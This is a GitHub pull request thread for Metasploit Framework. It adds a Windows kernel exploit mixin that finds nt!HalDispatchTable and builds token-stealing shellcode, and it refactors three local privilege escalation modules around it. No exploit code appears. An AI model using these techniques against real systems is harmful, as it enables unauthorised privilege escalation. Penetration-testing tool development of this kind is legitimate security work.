WindowsKernel Exploit Mixin And Module Refactoring

[zeroSteiner]

This PR adds a new WindowsKernel exploit mixin which offers convenient functions and reduces the amount of copy and paste code between the current modules. The functions provided are helpful for exploits which need to determine the address of nt!HalDispatchTable, create token stealing shellcode, and other general tasks. Out of the 5 exploits which seem to be copy and paste descendants from each other, the following 3 have been reworked to use the mixin:

• windows/local/ms11_080_afdjoinleaf
• windows/local/mqac_write
• windows/local/ms_ndproxy

The following two modules I left unchanged because I could not obtain access to the software for testing:

• windows/local/novell_client_nicm
• windows/local/novell_client_nwfs

Verification steps:

• Test the new ms11_080_afdjoinleaf exploit module
• Test the new mqac_write exploit module
• Test the new ms_ndproxy exploit module

[kernelsmith]

Nice!

On Aug 4, 2014, at 14:35, Spencer McIntyre notifications@github.com wrote:

This PR adds a new WindowsKernel exploit mixin which offers convenient functions and reduces the amount of copy and paste code between the current modules. The functions provided are helpful for exploits which need to determine the address of nt!HalDispatchTable, create token stealing shellcode, and other general tasks. Out of the 5 exploits which seem to be copy and paste descendants from each other, the following 3 have been reworked to use the mixin:

windows/local/ms11_080_afdjoinleaf
windows/local/mqac_write
windows/local/ms_ndproxy
The following two modules I left unchanged because I could not obtain access to the software for testing:

windows/local/novell_client_nicm
windows/local/novell_client_nwfs
Verification steps:

Test the new ms11_080_afdjoinleaf exploit module
Test the new mqac_write exploit module
Test the new ms_ndproxy exploit module
You can merge this Pull Request by running

git pull https://github.com/zeroSteiner/metasploit-framework windows-kernel
Or view, comment on, or merge it at:

#3612

Commit Summary

Create a basic WindowsKernel exploit mixin
Cleanup the WindowsKernel mixin
Add an open_device function for wrapping CreateFileA
Fix guessing the arch with modules specifying an array
Support writing a copy of the original token
Refactor MS11-080 to use the mixin and for style
Switch ms_ndproxy to use the new WindowsKernel mixin
Apply rubocop suggestions for ms_ndproxy
Update mqac_write to use the mixin and restore pointers
File Changes

A lib/msf/core/exploit/local/windows_kernel.rb (160)
M modules/exploits/windows/local/mqac_write.rb (103)
M modules/exploits/windows/local/ms11_080_afdjoinleaf.rb (213)
M modules/exploits/windows/local/ms_ndproxy.rb (307)
Patch Links:

https://github.com/rapid7/metasploit-framework/pull/3612.patch
https://github.com/rapid7/metasploit-framework/pull/3612.diff
—
Reply to this email directly or view it on GitHub.

[Meatballs1]

Why not just define the dll/function in rex/post/meterpreter/extensions/stdapi/railgun/def/def_psapi.rb? :)

[zeroSteiner]

Thanks for all the feedback @Meatballs1, I've implemented everything you pointed out except for putting the shellcode in external/data. Since psapi has it's definitions added to railgun now, I did remove the addition of the functions in the two novell exploits.

[Meatballs1]

I think railgun.util exposes pointer_size which is a bit neater

   def pointer_size
     is_64bit ? 8 : 4
   end

[Meatballs1]

Will see if I can get a couple of environments spun up at the weekend to test.